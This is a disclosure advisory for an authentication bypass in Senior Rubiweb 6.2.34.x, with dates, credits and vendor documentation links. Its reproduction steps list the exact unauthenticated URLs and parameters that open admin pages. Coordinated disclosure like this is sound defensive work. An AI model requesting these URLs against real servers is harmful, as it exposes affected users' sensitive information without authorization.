Remote Authentication Bypass in Senior Rubiweb 6.2.34.28 and 6.2.34.37 allows admin access to sensitive information of affected users using vulnerable versions. The attacker only needs to provide the correct URL.

• Announcement (to Vendor): 2019-12-02
• Public disclosure date: 2020-01-30

Incorrect Access Control

Senior

• Rubiweb - 6.2.34.37
• Rubiweb - 6.2.34.28
• Other versions may be affected, especially in the same family (not tested yet)

Rubiweb

Remote

True

Access to sensitive information is publicly available without special requirements (only the correct URI)

True

1. Simply try to connect to authenticated portal to confirm the existence and version of affected product:
   • hXXp://subdomain.customer.tld:8080/rubiweb/
2. Access the vulnerable page (admin without authentication):
   • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
   • hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU

Mauricio Santos (R&D UnderProtection) and Hesron Hori (R&D UnderProtection)

Senior - Vendor's Information Security Team who collaborated to a coordinated disclosure

• https://www.underprotection.com.br
• https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm
• https://documentacao.senior.com.br/tecnologia/6.2.34/index.htm#central-de-configuracao/CfgWebApplicationsForm.htm%23CfgWebApplicationsForm_edtUserName